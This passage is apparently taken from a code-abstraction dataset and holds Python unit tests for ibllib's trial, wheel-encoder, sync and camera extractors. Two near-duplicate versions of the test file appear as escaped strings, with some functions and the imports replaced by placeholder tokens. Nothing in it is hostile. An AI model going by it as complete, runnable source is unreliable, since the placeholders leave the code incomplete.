training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n 
).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n 
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = 
self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 
0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if 
~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, 
np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n 
self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n 
self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 